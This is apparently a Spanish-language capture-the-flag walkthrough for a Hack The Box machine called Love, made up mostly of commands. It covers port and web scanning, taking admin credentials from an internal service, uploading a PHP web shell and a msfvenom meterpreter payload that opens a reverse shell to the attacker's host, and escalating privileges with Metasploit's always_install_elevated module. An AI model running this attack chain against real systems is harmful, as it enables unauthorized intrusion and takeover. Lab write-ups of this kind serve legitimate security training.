nmap -A -p- -oA love 10.129.2.217 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210714133257.png

nmap -sC -sV -O -p- -oA love 10.129.2.217

nmap -sU -O -p- -oA love-udp 10.129.2.217

nikto -h 10.129.2.217:80

gobuster dir -k -u http://10.129.2.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210714123059.png

echo "10.129.2.217 staging.love.htb" | sudo tee -a /etc/hosts

Pasted image 20210714123556.png

Le damos click a demo

Pasted image 20210714123721.png

Metemos http:127.0.0.1:443 y vemos el error

Pasted image 20210714123806.png

Metemos http:127.0.0.1:5000 y vemos la contrasena

Pasted image 20210714124434.png

Metemos las credenciales en http://10.129.2.217/admin

Pasted image 20210714125345.png

msfvenom -p windows/meterpreter/reverse\_tcp LHOST=10.10.14.94 LPORT=3333 -f exe -o logo.exe

Pasted image 20210714131035.png

Vamos al dashboard y subimos el archivo logo.exe

Pasted image 20210714125259.png

Modificamos simple-backdoor.php y subimos el archivo tambien.

cp /usr/share/webshells/php/simple-backdoor.php .

Pasted image 20210714130204.png

Pasted image 20210714130303.png

http://10.129.2.217/images/simple-backdoor.php?cmd=whoami

Pasted image 20210714130406.png

Pasted image 20210714131122.png

msf6> use exploit/multi/handler

msf6> set LHOST tun0

msf6> set LPORT 3333

msf6>set payload windows/meterpreter/reverse_tcp

msf6>run

Pasted image 20210714131226.png

http://10.129.2.217/images/simple-backdoor.php?cmd=logo.exe

Pasted image 20210714131508.png

Nos vamos a C:\Users\Phoebe\Desktop

Pasted image 20210714132101.png

msf6> use exploit/windows/local/always_install_elevated

msf6> set LHOST tun0

msf6> set LPORT 3333

msf6>set session 1

msf6>run

Pasted image 20210714132738.png

boxes

copyright©2022 Cu3rv0x all rights reserved